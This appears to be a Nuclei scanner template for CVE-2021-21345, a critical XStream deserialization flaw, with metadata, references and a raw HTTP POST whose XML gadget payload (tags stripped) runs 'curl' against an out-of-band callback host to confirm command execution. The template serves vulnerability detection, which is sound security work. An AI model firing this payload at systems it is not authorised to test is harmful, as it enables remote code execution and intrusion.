id: CVE-2021-21345 info: name: XStream <1.4.16 - Remote Code Execution author: pwnhxl,vicrack severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 epss-score: 0.4541 epss-percentile: 0.97334 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml 2 com.sun.corba.se.impl.activation.ServerTableEntry com.sun.corba.se.impl.activation.ServerTableEntry verify true 1 UTF-8 curl http://{{interactsh-url}} 3 javax.xml.ws.binding.attachments.inbound javax.xml.ws.binding.attachments.inbound matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl" # digest: 4a0a00473045022100c57ea9d8cecf995608fe7d5b0128a9e6783b30e14e86bd3ba5820cc61fb13e5c02204144080c1e53f2cbea11cc5770c68b6014c15e5d0215a769eadff83ae34e16d0:922c64590222798bb761d5b6d8e72950